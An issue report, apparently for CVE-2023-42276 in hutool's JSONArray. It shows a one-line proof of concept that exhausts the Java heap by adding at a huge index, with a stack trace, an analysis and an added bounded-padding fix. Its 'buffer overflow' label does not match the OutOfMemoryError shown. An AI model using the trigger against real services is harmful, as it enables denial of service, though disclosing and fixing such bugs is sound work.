Headline
CVE-2023-42276: The `add()` method of `JSONArray` throws an OutOfMemory exception · Issue #3286 · dromara/hutool
hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.
Version information
JDK version: 1.8.0_362
hutool version: 5.8.21
Problem description (including screenshots)
- Reproduction code
```java
import cn.hutool.json.JSONArray;

public class JSONObjectTest {
    public static void main(String[] args) {
        JSONArray jSONArray = new JSONArray();
        Object element = new Object();
        // Index far beyond the current length (0) of the empty array
        jSONArray.add(1247626122, element);
    }
}
```
Stack trace
```
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    at java.util.Arrays.copyOf(Arrays.java:3210)
    at java.util.Arrays.copyOf(Arrays.java:3181)
    at java.util.ArrayList.grow(ArrayList.java:267)
    at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    at java.util.ArrayList.add(ArrayList.java:464)
    at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    at cn.hutool.json.JSONArray.add(JSONArray.java:461)
    at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
```
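Files involved in the test (remember to redact sensitive data)
See the reproduction code.
Analysis
`jsonArray.add(idx, element)` adds an element `element` at the specified index `idx`. If the length of the jsonArray is less than the specified index, `jsonArray.add()` keeps adding `null` in a loop until the length of the jsonArray equals the specified index value. If this index is very large, for example 1247626122, an OOM exception is reported.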
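The following is an added example, not hutool's code and not the project's fix: it models the pad-with-`null` behaviour described in the analysis on a plain `java.util.List` and puts a limit check in front of the padding loop. The class name, `addAt`, the in-range insert branch and the `MAX_PADDING` value are assumptions chosen for illustration.

```java
import java.util.ArrayList;
import java.util.List;

/** Added example: limit check in front of a pad-with-null indexed insert. */
public class BoundedIndexedAdd {

    // Assumed policy limit: how many null slots a single call may create.
    static final int MAX_PADDING = 1_000;

    /**
     * Models the behaviour described in the analysis: when index is past the
     * end, pad with null until size == index, then append the element.
     * The call is rejected before any allocation if the padding is too large.
     */
    static <T> void addAt(List<T> list, int index, T element) {
        if (index < 0) {
            throw new IndexOutOfBoundsException("negative index: " + index);
        }
        // Both values are non-negative here, so the subtraction cannot overflow.
        int padding = index - list.size();
        if (padding > MAX_PADDING) {
            throw new IllegalArgumentException(
                "index " + index + " needs " + padding
                + " null slots, limit is " + MAX_PADDING);
        }
        if (index < list.size()) {
            list.add(index, element);   // assumed: ordinary in-range insert
            return;
        }
        while (list.size() < index) {
            list.add(null);             // padding, bounded by the check above
        }
        list.add(element);
    }

    public static void main(String[] args) {
        List<Object> array = new ArrayList<>();
        addAt(array, 3, "d");           // three null slots, within the limit
        System.out.println(array);
        try {
            addAt(array, 1247626122, new Object());   // index from the report
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("size after rejected call: " + array.size());
    }
}
```

Where the index comes from untrusted input (for example a parsed request field), the same check belongs at the point where that value is first validated, so the oversized index never reaches the array.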